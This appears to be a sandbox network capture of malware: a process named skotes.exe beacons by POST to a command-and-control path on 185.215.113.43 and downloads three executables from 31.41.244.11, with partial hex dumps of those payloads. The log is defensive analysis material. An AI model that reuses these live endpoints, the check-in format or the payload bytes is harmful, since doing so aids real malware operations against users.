Jan 7, 2025 10:08:19.515954018 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: #<SAIkUF8O#S1IkUF8O%
Jan 7, 2025 10:08:19.516040087 CET	1236	IN	Data Raw: cf 40 b1 fc 3b 4f 9d 42 83 a3 1b 69 84 bb d3 cc 51 ff 6b e4 b6 7d 6d fc db 7e 38 c9 4f 25 70 64 d7 40 b1 fc 3b cf 95 42 83 a3 fb 68 84 bb d3 2c 52 ff 6b e4 96 7d 6d fc db 7e 38 c9 4f 25 70 64 df 40 b1 fc 3b 17 9f 42 83 a3 db 68 84 bb d3 8c 52 ff Data Ascii: @;OBiQk}m~8O%pd@;Bh,Rk}m~8O%pd@;BhRkv\|m~8O%pd@;BhRkV\|m~8O%pd@;wBhLSk6\|m~8O%pd@;B{hSk\|m~8O%pd@;B[hTk\|m~8O%pd@;B;hlTk
Jan 7, 2025 10:08:19.516053915 CET	1236	IN	Data Raw: f6 78 6d fc db 7e 38 c9 4f 25 7c 64 7f 41 b1 fc 3b 8f 99 42 83 a3 3b 64 84 bb d3 6c 60 ff 6b e4 d6 78 6d fc db 7e 38 c9 4f 25 80 64 93 42 b1 fc 3b 0f 98 42 83 a3 1b 64 84 bb d3 cc 60 ff 6b e4 b6 78 6d fc db 7e 38 c9 4f 25 74 64 ab 42 b1 fc 3b df Data Ascii: xm~8O%\|dA;B;dl`kxm~8O%dB;Bd`kxm~8O%tdB;Bc,akxm~8O%dB;Bcakvwm~8O%tdB;[BcakVwm~8O%dB;gBcLbk6wm~8O%\|dB;B{cbkwm~8O%pdB;
Jan 7, 2025 10:08:19.516068935 CET	1236	IN	Data Raw: 83 a3 7b 5f 84 bb d3 ac 6e ff 6b e4 16 73 6d fc db 7e 38 c9 4f 25 74 64 13 46 b1 fc 3b 07 97 42 83 a3 5b 5f 84 bb d3 0c 6f ff 6b e4 f6 73 6d fc db 7e 38 c9 4f 25 74 64 1f 46 b1 fc 3b d7 96 42 83 a3 3b 5f 84 bb d3 6c 6f ff 6b e4 d6 73 6d fc db 7e Data Ascii: {_nksm~8O%tdF;B[_oksm~8O%tdF;B;_loksm~8O%td+F;B_oksm~8O%\|d7F;B^,pksm~8O%pdKF;GB^pkvrm~8O%pdSF;gB^pkVrm~8O%\|d[F;OB^Lqk6rm~8
Jan 7, 2025 10:08:19.516081095 CET	552	IN	Data Raw: 4f 10 f7 e8 06 9f 64 fc f8 cb d5 fc 81 30 74 66 82 0c 54 d7 82 ba 6b 88 8b ba dc 00 06 84 6d 4d 6b 0f d1 ff 82 3e 35 fc 06 7f 88 81 43 ca b3 bd 0e a0 c9 bf 4f 87 38 c9 4f 87 38 c9 4f 87 38 c9 4f 10 f7 e8 0e 08 74 89 c8 cb bb 4d 82 30 78 e4 30 ba Data Ascii: Od0tfTkmMk>5CO8O8O8OtM0x0kxYF8O8OxAF`SQwHIdJbmnhGMgm7OF]{B3AtCntI7OHJ&n~8
Jan 7, 2025 10:08:19.516103029 CET	1228	IN	Data Raw: da 7b f9 42 87 0b 33 03 17 c0 b0 fc e8 ca 41 fd 0d 00 74 7f 43 bf bb e4 6f ce 6e fc 05 7f 74 c3 89 2f 72 41 83 46 32 5b e0 7d 70 fc 4e 87 38 c9 4f 87 38 c9 4f 87 38 c9 4f 10 f7 e8 d9 46 5d 0c da 7b f9 42 87 0b 33 03 17 c0 b0 fc e8 ca 41 fd 0d 00 Data Ascii: {B3AtCont/rAF2[}pN8O8O8OF]{B3AtC/ntwqAF2[}pN8O8O8OR\DpqFr{qFrQZF8O8O+7O8O8OxAF`SQwHIdJbmnh
Jan 7, 2025 10:08:19.520865917 CET	1236	IN	Data Raw: 0e 7c ed f6 83 cb 6b fc f4 cb f6 45 7f 3e 2e 20 ae 7c ef bc 7f 3e 64 1c fa df bd 4d 6b 8a 18 fe 82 3e 30 05 4a c1 03 03 c8 bb f6 c2 0e 08 60 61 0c c8 6b fc 82 bb c4 5a 0e a0 c9 be 8b bb 53 b1 c5 be 6b c8 4f 87 38 c9 4f 87 38 c9 4f 10 f7 e8 d9 46 Data Ascii: \|kE>. \|>dMk>0J`akZSkO8O8OF,TC3ApLkzslGBD\|JZ}pN8O8OF,TC3ApLk6zslGBD\|7O8O8O8Os}.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50016	185.215.113.43	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:58.179492950 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 36 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032619001&unit=246122658369
Jan 7, 2025 10:08:58.874619007 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50017	31.41.244.11	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:59.063891888 CET	66	OUT	GET /files/1506757897/Dd7mHw1.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:08:59.745405912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:59 GMT Content-Type: application/octet-stream Content-Length: 9578331 Last-Modified: Mon, 06 Jan 2025 11:29:34 GMT Connection: keep-alive ETag: "677bbe9e-92275b" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5b 46 0e 24 1f 27 60 77 1f 27 60 77 1f 27 60 77 bd e0 b3 77 1e 27 60 77 ee e1 ad 77 05 27 60 77 88 79 64 76 1e 27 60 77 ee e1 ae 77 9a 27 60 77 bd e0 ae 77 1e 27 60 77 ee e1 af 77 5f 27 60 77 e3 50 dc 77 1b 27 60 77 1f 27 61 77 d5 26 60 77 e3 50 d9 77 08 27 60 77 bd e0 af 77 32 27 60 77 bd e0 a9 77 1e 27 60 77 1f 27 f7 77 1e 27 60 77 bd e0 ac 77 1e 27 60 77 52 69 63 68 1f 27 60 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 50 ef 2c 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b2 06 00 00 dc 07 00 00 00 00 00 c7 36 04 00 00 10 00 00 00 d0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[F$'`w'`w'`ww'`ww'`wydv'`ww'`ww'`ww_'`wPw'`w'aw&`wPw'`ww2'`ww'`w'w'`ww'`wRich'`wPELP,a6@@\Ft`j@8@B.text `.rdataT@@.dataXIp$L@.rsrctp@@.reloc`@B
Jan 7, 2025 10:08:59.745419025 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 8b 4d 10 85 c9 74 1b 8b 45 0c 0f b7 d0 8b c2 c1 e2 10 57 8b 7d 08 Data Ascii: UMtEW}f_E]UEuE]E]FUEtPuuuJE]UUtEMf9t
Jan 7, 2025 10:08:59.745513916 CET	1236	IN	Data Raw: 0a 83 c1 02 4a 75 f5 33 c0 5d c3 8b c1 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 10 85 c0 75 05 8b 45 08 5d c3 03 c0 89 45 10 5d e9 a6 f9 03 00 cc cc cc cc cc cc 55 8b ec f6 45 08 01 56 8b f1 c7 06 bc 19 47 00 74 09 56 e8 b5 ee 03 00 83 Data Ascii: Ju3]]UEuE]E]UEVGtV^]UEUH]UUuRPUH;Ju;u]2]UE;Hu;Eu]2](G
Jan 7, 2025 10:08:59.745526075 CET	1236	IN	Data Raw: 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 c7 45 f0 00 00 00 00 e8 3c fe ff ff 8b 75 e8 85 c0 75 3b 8d 45 f8 50 8d 45 fc 50 8d 45 f4 50 6a 00 68 2c 8f 47 00 56 c7 45 fc 00 00 00 00 c7 45 f8 04 00 00 00 ff 15 04 d0 46 00 85 c0 75 0f 83 7d f4 04 75 09 Data Ascii: EEE<uu;EPEPEPjh,GVEEFu}u}2tV<F^[]UjhFdP}H3ESVWPEd=PH<t)=THj_@HC@HPQPT
Jan 7, 2025 10:08:59.745536089 CET	448	IN	Data Raw: 8d 45 80 50 56 c7 45 80 ff fe 00 00 ff 15 64 d2 46 00 a1 68 d2 46 00 c6 05 85 a8 48 00 01 6a 02 6a 00 6a 00 56 ff d0 83 7d d8 08 6a 00 8d 85 7c ff ff ff 50 8b 45 d4 8d 4d c4 0f 43 4d c4 03 c0 50 51 56 ff 15 64 d2 46 00 85 f6 74 0c a1 c4 d2 46 00 Data Ascii: EPVEdFhFHjjjV}j\|PEMCMPQVdFtFtVEu@Fuu}ru3fEEEE@tFMdY_^M3O]UjhFdP}H3
Jan 7, 2025 10:08:59.745568037 CET	1236	IN	Data Raw: 00 e8 2b 16 00 00 c7 84 24 88 00 00 00 e4 45 47 00 c7 84 24 b0 00 00 00 78 ef 46 00 ff d6 89 84 24 b4 00 00 00 33 c0 66 89 84 24 8c 00 00 00 89 84 24 a4 00 00 00 89 84 24 a8 00 00 00 89 84 24 ac 00 00 00 8b 84 24 b0 00 00 00 c7 84 24 a0 00 00 00 Data Ascii: +$EG$xF$3f$$$$$$$@hD$ P$$$@3h0hGjjh\FL$$gjD$PW$C$HQ$
Jan 7, 2025 10:08:59.745577097 CET	224	IN	Data Raw: 00 00 c7 44 24 6c 00 00 00 00 8b 40 04 ff 74 04 58 ff d3 8b 84 24 e0 00 00 00 8d b4 24 e0 00 00 00 8b 40 04 03 f0 ff 15 9c d2 46 00 89 06 ff b4 24 d4 00 00 00 e8 77 e2 03 00 83 c4 04 ff b4 24 dc 00 00 00 ff d7 83 bc 24 d0 00 00 00 08 72 09 ff b4 Data Ascii: D$l@tX$$@F$w$$r$3f$$$$@$$@F$$$r$3f$$
Jan 7, 2025 10:08:59.745596886 CET	1236	IN	Data Raw: 00 00 00 c7 84 24 a0 00 00 00 07 00 00 00 c7 84 24 9c 00 00 00 00 00 00 00 8b 40 04 ff b4 04 88 00 00 00 ff d3 8b 44 24 50 8d 74 24 50 8b 40 04 03 f0 ff 15 9c d2 46 00 89 06 ff 74 24 44 e8 8e e1 03 00 83 c4 04 ff 74 24 4c ff d7 83 7c 24 40 08 72 Data Ascii: $$@D$Pt$P@Ft$Dt$L\|$@rt$,3fD$,D$(D$@D$<@t($dY_^[$3]U=8Ht =HutH8H=Ht$UzrM
Jan 7, 2025 10:08:59.745606899 CET	224	IN	Data Raw: 8b 09 33 d2 66 89 14 41 8b c6 5e 8b e5 5d c2 08 00 6a 00 2b c2 50 e8 3e 28 00 00 8b c6 5e 8b e5 5d c2 08 00 cc cc cc cc cc 55 8b ec 83 e4 f8 6a ff 68 99 bb 46 00 64 a1 00 00 00 00 50 83 ec 78 a1 b8 7d 48 00 33 c4 89 44 24 70 53 56 57 a1 b8 7d 48 Data Ascii: 3fA^]j+P>(^]UjhFdPx}H3D$pSVW}H3P$dED$=FD$D$D$PEGD$xxFD$\|$t33jPVL$`D$tD$pfD$`K(D$xFD$l
Jan 7, 2025 10:08:59.745620966 CET	1236	IN	Data Raw: c7 44 24 70 00 00 00 00 c7 44 24 74 00 00 00 00 8b 40 04 ff 74 04 78 ff d3 c7 84 24 90 00 00 00 01 00 00 00 8b 44 24 64 8d 48 ff 85 c0 74 1e 3b c8 73 1a 83 7c 24 68 08 8d 44 24 54 0f 43 44 24 54 66 83 3c 48 5c 0f 94 44 24 12 eb 05 c6 44 24 12 00 Data Ascii: D$pD$t@tx$D$dHt;s\|$hD$TCD$Tf<H\D$D$D$ PL$TD$Ht$H@t$<=Ft$D\|$8rt$$3fD$$D$ D$8D$4@t jD$$PL$X$D$t3xHrQP
Jan 7, 2025 10:08:59.750289917 CET	1236	IN	Data Raw: 02 5c 75 07 b8 d0 8e 47 00 eb 2e 6a 00 8d 84 24 8c 00 00 00 50 8d 4c 24 30 e8 77 11 00 00 c6 84 24 28 01 00 00 02 83 c0 04 c7 44 24 1c 01 00 00 00 83 78 14 08 72 02 8b 00 6a 01 8d 4c 24 1b 51 50 8d 8c 24 c4 00 00 00 e8 98 f6 ff ff c7 84 24 28 01 Data Ascii: \uG.j$PL$0w$(D$xrjL$QP$$(D$=F$$@F$$$r$3f$$$$@5FD$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50018	185.215.113.43	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:11.508027077 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 36 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032622001&unit=246122658369
Jan 7, 2025 10:09:12.184135914 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50019	31.41.244.11	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:12.588273048 CET	66	OUT	GET /files/5876083921/tbd0KQd.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:13.226731062 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:13 GMT Content-Type: application/octet-stream Content-Length: 366592 Last-Modified: Tue, 07 Jan 2025 05:43:16 GMT Connection: keep-alive ETag: "677cbef4-59800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 db 35 e6 fd 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 86 00 00 00 06 00 00 00 00 00 00 ae a4 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 50 c7 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 a4 00 00 4b 00 00 00 00 c0 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 16 a4 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5.0 @ P``KB H.text `.rsrcB@@.reloc@B.bss@
Jan 7, 2025 10:09:13.226743937 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 88 3f 00 00 44 3f 00 00 03 00 02 Data Ascii: H?D?~0V~:K( s((( ?r
Jan 7, 2025 10:09:13.226878881 CET	1236	IN	Data Raw: 00 70 73 14 00 00 0a 7a 2a 00 00 2e 28 26 00 00 06 28 01 00 00 06 2a 1b 30 06 00 01 01 00 00 02 00 00 11 03 3a 0b 00 00 00 72 ea 00 00 70 73 14 00 00 0a 7a 20 00 01 00 00 8d 1d 00 00 01 0a 20 00 01 00 00 8d 1d 00 00 01 0b 16 0c 38 15 00 00 00 06 Data Ascii: psz.(&(0:rpsz 8(]X ?8$XX ]X ?8fXrp(]X ]o(
Jan 7, 2025 10:09:13.226891041 CET	1236	IN	Data Raw: 1a 00 00 04 16 80 1b 00 00 04 73 32 00 00 0a 80 1c 00 00 04 16 80 1d 00 00 04 16 6a 80 1e 00 00 04 14 80 1f 00 00 04 14 80 20 00 00 04 16 6a 80 21 00 00 04 16 80 22 00 00 04 16 80 23 00 00 04 16 80 24 00 00 04 16 80 25 00 00 04 7e 31 00 00 0a 80 Data Ascii: s2j j!"#$%~1&'s3()+,-.~1/(4&EP*0W iZ ]Y X ]:
Jan 7, 2025 10:09:13.226918936 CET	448	IN	Data Raw: 06 12 04 11 05 11 06 09 1f 0a 1f 17 1f 28 06 28 16 00 00 06 12 03 11 04 11 05 11 06 1f 0d 1a 1f 29 06 28 16 00 00 06 12 06 09 11 04 11 05 16 1f 0b 1f 2a 06 28 16 00 00 06 12 05 11 06 09 11 04 19 1f 10 1f 2b 06 28 16 00 00 06 12 04 11 05 11 06 09 Data Ascii: (()(*(+(,(-(.(/(0(1(2(3(4(
Jan 7, 2025 10:09:13.226931095 CET	1236	IN	Data Raw: 11 06 09 1f 09 1f 15 1f 40 06 28 17 00 00 06 09 11 0f 58 0d 11 04 11 10 58 13 04 11 05 11 11 58 13 05 11 06 11 12 58 13 06 11 0d 17 58 13 0d 11 0d 08 1f 10 5c 44 e2 fa ff ff 1f 10 8d 1d 00 00 01 13 07 09 28 35 00 00 0a 16 11 07 16 1a 28 36 00 00 Data Ascii: @(XXXXX\D(5(6(5(6(5(6(5(6K_f_`XX~YX(XTK_f_`XX~YX(XT*KaaX
Jan 7, 2025 10:09:13.226946115 CET	1236	IN	Data Raw: 6f 42 00 00 0a 0d 08 02 42 0f 00 00 00 02 08 07 58 41 06 00 00 00 09 02 58 08 59 2a 06 17 58 0a 06 03 3f af ff ff ff 16 2a 00 00 1b 30 06 00 99 04 00 00 0a 00 00 11 02 28 2e 00 00 0a 0a 7e 0e 00 00 04 3a 64 02 00 00 7e 0f 00 00 04 0c 16 0d 08 12 Data Ascii: oBBXAXYX?0(.~:d~(CsD(.o/rpoEsF%o@joA%%o@oGioHoI9i]i[i>X8MZ
Jan 7, 2025 10:09:13.226969957 CET	448	IN	Data Raw: 4c 00 00 02 00 00 00 19 00 00 00 4f 02 00 00 68 02 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 8a 02 00 00 ed 01 00 00 77 04 00 00 06 00 00 00 1c 00 00 01 00 00 00 00 00 00 00 00 92 04 00 00 92 04 00 00 06 00 00 00 1c 00 00 01 2e 72 42 03 00 70 28 Data Ascii: LOhw.rBp(j.rvp(jZ(k9rpsz0DsT%oUjoA%%oUoGioVoYs(;s(:(l~omon9;94
Jan 7, 2025 10:09:13.226982117 CET	1236	IN	Data Raw: 04 73 1a 00 00 06 07 08 06 28 1b 00 00 06 2a 13 30 05 00 22 00 00 00 0c 00 00 11 72 ce 03 00 70 28 77 00 00 0a 26 02 28 78 00 00 0a 0a 28 79 00 00 0a 06 16 06 8e 69 6f 20 00 00 0a 2a 00 00 0a 1b 2a 00 1b 30 02 00 12 00 00 00 00 00 00 00 17 28 34 Data Ascii: s(0"rp(w&(x(yio 0(4&0SU(.rp,%4(.%,(.(z%4%o{t1*0t3o\|(}9
Jan 7, 2025 10:09:13.227014065 CET	1236	IN	Data Raw: 00 0a 00 37 41 00 0d 00 00 00 00 1a 73 89 00 00 0a 2a 00 32 02 74 4b 00 00 01 6f 8a 00 00 0a 2a 00 00 00 13 30 06 00 65 00 00 00 0f 00 00 11 28 37 00 00 06 0a 28 1c 00 00 06 0b 07 1f 20 8d 1d 00 00 01 25 d0 36 00 00 04 28 19 00 00 0a 6f 8b 00 00 Data Ascii: 7As2tKo0e(7( %6(o%9(oosq%iorot(8(rrr6poj&&%%rrjpoj&&%%*rrpoj&&%%
Jan 7, 2025 10:09:13.231849909 CET	1236	IN	Data Raw: 00 24 07 5d 00 06 00 40 07 5d 00 06 00 47 07 29 00 06 00 66 07 5d 00 06 00 6c 07 5d 00 0a 00 7f 07 8b 07 06 00 b3 07 b8 07 06 00 cf 07 5d 00 06 00 ee 07 f7 07 06 00 17 08 5d 00 06 00 4d 08 5d 00 06 00 27 09 dd 00 06 00 41 09 5d 00 06 00 46 09 dd Data Ascii: $]@]G)f]l]]]M]'A]FPq]]]1]>]D[]:Mr]Ap

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	50020	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:16.390433073 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 36 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032624001&unit=246122658369
Jan 7, 2025 10:09:17.078417063 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	50022	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:17.105731964 CET	65	OUT	GET /files/899392756/artVssK.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:17.774283886 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:17 GMT Content-Type: application/octet-stream Content-Length: 439296 Last-Modified: Mon, 06 Jan 2025 12:08:44 GMT Connection: keep-alive ETag: "677bc7cc-6b400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 09 55 68 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PELUhg'@0@EE8@<.textj `.rdataHJ@@.datam`,@@.rsrcl@@.relocEFn@B
Jan 7, 2025 10:09:17.774306059 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 50 ca 44 00 e8 87 8d 02 00 59 c3 cc cc cc cc 68 f0 c9 44 00 e8 77 8d 02 00 59 Data Ascii: hPDYhDwYj hEdnF/hDVYj hEtFo/hD6YjhETuFO/hpDYj h$EoF//hDYjhHEL
Jan 7, 2025 10:09:17.774405956 CET	1236	IN	Data Raw: 74 46 00 e8 0f 2f 02 00 68 30 cc 44 00 e8 d6 8c 02 00 59 c3 cc cc cc 6a 1c 68 60 d0 45 00 b9 8c 6d 46 00 e8 ef 2e 02 00 68 90 cc 44 00 e8 b6 8c 02 00 59 c3 cc cc cc 6a 00 68 7b ce 45 00 b9 24 75 46 00 e8 cf 2e 02 00 68 f0 cc 44 00 e8 96 8c 02 00 Data Ascii: tF/h0DYjh`EmF.hDYjh{E$uF.hDYjh{EuF.hPDvYjh{EoF.hDVYjh{EmFo.hD6YjhEnFO.hpDYjhE8xF/.hDY
Jan 7, 2025 10:09:17.774415970 CET	224	IN	Data Raw: cc cc cc 6a 0c 68 30 d3 45 00 b9 2c 6d 46 00 e8 2f 2a 02 00 68 d0 da 44 00 e8 f6 87 02 00 59 c3 cc cc cc 6a 0c 68 40 d3 45 00 b9 c4 6e 46 00 e8 0f 2a 02 00 68 30 db 44 00 e8 d6 87 02 00 59 c3 cc cc cc 6a 04 68 50 d3 45 00 b9 98 78 46 00 e8 ef 29 Data Ascii: jh0E,mF/hDYjh@EnFh0DYjhPExF)hDYjhXExF)hDYjh`EuF)hPDvYjhhEwF)hDVYjhpEnFo)hD6Y
Jan 7, 2025 10:09:17.774425983 CET	1236	IN	Data Raw: cc cc cc 6a 0c 68 7c d3 45 00 b9 28 79 46 00 e8 4f 29 02 00 68 70 dd 44 00 e8 16 87 02 00 59 c3 cc cc cc 6a 0c 68 8c d3 45 00 b9 5c 6d 46 00 e8 2f 29 02 00 68 d0 dd 44 00 e8 f6 86 02 00 59 c3 cc cc cc 6a 04 68 9c d3 45 00 b9 ec 70 46 00 e8 0f 29 Data Ascii: jh\|E(yFO)hpDYjhE\mF/)hDYjhEpF)h0DYjhEmF(hDYjhE$oF(hDYjhEdqF(hPDvYjhEloF(hDVYjhE xFo(
Jan 7, 2025 10:09:17.774465084 CET	1236	IN	Data Raw: 68 b0 eb 44 00 e8 56 82 02 00 59 c3 cc cc cc 6a 4c 68 d8 d5 45 00 b9 c4 71 46 00 e8 6f 24 02 00 68 10 ec 44 00 e8 36 82 02 00 59 c3 cc cc cc 6a 3c 68 28 d6 45 00 b9 a4 6d 46 00 e8 4f 24 02 00 68 70 ec 44 00 e8 16 82 02 00 59 c3 cc cc cc 6a 0c 68 Data Ascii: hDVYjLhEqFo$hD6Yj<h(EmFO$hpDYjhhEsF/$hDYjhxE<rF$h0DYjhEqF#hDYjhEtF#hDYj@hE$lF#hPDvYjPh
Jan 7, 2025 10:09:17.774477005 CET	448	IN	Data Raw: 45 00 b9 b4 72 46 00 e8 af 1f 02 00 68 50 fa 44 00 e8 76 7d 02 00 59 c3 cc cc cc 6a 20 68 5c da 45 00 b9 0c 6f 46 00 e8 8f 1f 02 00 68 b0 fa 44 00 e8 56 7d 02 00 59 c3 cc cc cc 6a 0c 68 80 da 45 00 b9 e0 78 46 00 e8 6f 1f 02 00 68 10 fb 44 00 e8 Data Ascii: ErFhPDv}Yj h\EoFhDV}YjhExFohD6}YjhErFOhpD}YjhEtF/hD\|YjhE,vFh0D\|YhD\|YhD\|YhPD\|Yj@hE
